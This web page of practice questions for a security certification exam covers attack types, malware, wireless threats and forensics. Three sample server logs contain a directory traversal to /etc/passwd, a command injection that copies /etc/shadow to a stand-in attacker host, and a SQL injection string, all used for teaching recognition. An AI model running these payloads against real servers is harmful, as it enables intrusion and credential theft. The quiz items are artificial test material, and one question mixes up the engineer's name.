Pen used to do a practice exam.

Domain 1 Quiz

Domain 1 Quiz

  1. Assign the attack names at right to the descriptions at left. You use each attack name once. Something like "Number 5 matches e", for numbers 1 through 4. On the real exam, this will take the form of pull-down menus by each description.
    1. Walking down the street, you get advertising messages from stores you are walking past
    2. You hear from friends that contact information they shared only with you seems to be loose on the Internet
    3. You receive text messages containing random advertisements
    4. You receive recorded phone calls that you believe are in Mandarin, a language you don't speak
    1. SPIM
    2. Bluesnarfing
    3. Vishing
    4. Bluejacking
  2. Liz is a security analyst for the IT department of a large university with a correspondingly large number of users. She has been investigating a sophisticated privilege escalation attack. She has determined that the attacker used an ordinary user account with a rather large user ID number. The attack changed that to a very low user ID number, associated with a highly privileged system account. Which of these did the attack utilize?
    1. Improper account configuration
    2. Memory leak
    3. Buffer overflow
    4. Integer overflow
    5. Race condition
  3. You are equipping a forensics team. Which of these would be most useful?
    1. A set of precision screwdrivers
    2. A cheap camera
    3. Luminol
    4. Latex gloves and masks
  4. You observe the following.
    66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305
    54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - -
    174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /../../../etc/passwd HTTP/1.1" 200 25310 "https://www.bing.com/" - -
    174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - -
    66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
    
    What type of attack has happened?
    1. SQL Injection
    2. Directory Traversal
    3. Buffer Overflow
    4. Command Injection
  5. You observe the following.
    66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305
    54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - -
    174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /cgi-bin/?cmd=scp%20/etc/shadow%20hacker@evil.com HTTP/1.1" 200 25310 "https://www.bing.com/" - -
    174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - -
    66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
    
    What type of attack has happened?
    1. SQL Injection
    2. Directory Traversal
    3. Buffer Overflow
    4. Command Injection
  6. You observe the following.
    66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305
    54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - -
    174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /database/'%20OR%201=1%20;-- HTTP/1.1" 200 25310 "https://www.bing.com/" - -
    174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - -
    66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
    
    What type of attack has happened?
    1. SQL Injection
    2. Directory Traversal
    3. Buffer Overflow
    4. Command Injection
  7. You are examining web server logs, and you notice some unusually long requests. What type of attack has happened?
    1. SQL Injection
    2. Directory Traversal
    3. Buffer Overflow
    4. Command Injection
  8. You observe the following in the results of a security scan. What is this?
    Channel SSID
    1 corpnet3
    6 corpnet3
    6 netgear
    11 corpnet3
    1. Evil twin
    2. Rogue AP
    3. Bluesmacking
    4. Watering hole
  9. Last week Ann, a staff member in the Human Resources department, did a Google search and clicked on one of the links on the first page of results. That took her to a strange page. She went back, realized she had misspelled her search, corrected that, and found what she needed. Today she logged on to her bank site from work and noticed some mysterious transfers from her account to a bank in Eastern Europe. What has happened?
    1. Clickjacking
    2. Ransomware
    3. Crimeware
    4. Extortionware
    5. Spyware
  10. You observe the following in the results of a security scan. What is this?
    Channel SSID
    1 corpnet3
    6 corpnet3
    6 corpnet3
    11 corpnet3
    1. Evil twin
    2. Rogue AP
    3. Bluesmacking
    4. Watering hole
  11. Shonda, a security auditor at a financial institution, discovered an advanced attack that had stolen and exfiltrated a great deal of sensitive information. She searched a database for details of the attack, but found nothing. After a great deal of investigation and research, she discovered that it seems to be a new vulnerability with no available patch, and she implemented a workaround. What did she discover?
    1. False-positive event
    2. False-negative event
    3. Zero-day event
    4. IDS failure event
    5. IPS failure event
  12. Shari, a network engineer at a major health care facility, has determined that when the head of the Radiology department authenticated to the medical image database server, the encrypted traffic was captured by an intruder. That intruder later transmitted that information again to access the database as the highly privileged account. What type of attack is this?
    1. APT
    2. Rootkit
    3. Rogue AP
    4. Replay
  13. Desmond, a network engineer, has been directed to set up network security that will require a device to authenticate itself onto the network and verify that patching and anti-virus signatures are updated, before allowing the user to try to authentication. What should Charlie use?
    1. 802.1i
    2. 802.1x
    3. 802.1q
    4. 802.11i
  14. Mehmet, the database administrator, has discovered that a user has accidentally deleted an entire database table. What went wrong?
    1. Misconfigured account
    2. Untrained user
    3. Inadequate input validation
    4. Memory leak
  15. News reports tell of a major DDoS against a famous company. Meanwhile, you receive a letter from your ISP saying that your home computer is sending malicious Linux-sourced traffic. But you don't own a Linux computer, in fact you don't own any computer. Your home electronics are limited to a smart TV with a Blu-ray player and a DVR. What has happened?
    1. Nothing, your ISP is wrong
    2. RAT
    3. BOT
    4. Trojan
  16. Jim is a software developer. Tina, his manager, has asked him to list software design and development security issues to share with new team members. Which of these is the reason for most software vulnerabilities?
    1. Improper input handling
    2. Inadequate error handling
    3. Support beyond end-of-life
    4. Default configurations
  17. Inga, a security analyst at a government agency, is inspecting the components of her operating system. She had identified what looks like a compatibility driver, but she suspects that it is being used by malware to monitor keystrokes and steal other data. If so, what malware technique has she discovered?
    1. Driver masquerading
    2. Shimming
    3. Driver refactoring
    4. Data flow manipulating
  18. Alexandra is a White Hat penetration tester doing a Black Box attack. She is using software to automatically submit queries to the search form on a web page. What is she doing?
    1. Active reconnaissance
    2. Passive reconnaissance
    3. Open-source analysis
    4. Pivoting
  19. Jermain has been trying to print a document on a nearby printer. It is operational, from time to time it produces a print job and someone from several offices down the hall arrives to collect their output. What is probably responsible? Select two
    1. Bluesnarfing
    2. Bluesmacking
    3. Bluejacking
    4. Jamming
    5. Bluesniffing
  20. Vladimir has written some malicious software that adds unneeded loops, NOPs, and other ineffectual code every time it is executed or spread to a new platform. What technique is he using?
    1. Refactoring
    2. Shimming
    3. Masquerading
    4. Modifying
  21. Peter is a security analyst at a bank. The bank wants to extend its use of an outdated operating system, as the alternative would require replacing all their existing automated teller machines built into storefronts and standalone brick kiosks. What problem will they have to solve?
    1. Embedded systems
    2. EOL
    3. IoT
    4. Input validation
    5. Error handling

To the answers

To the Cybersecurity Page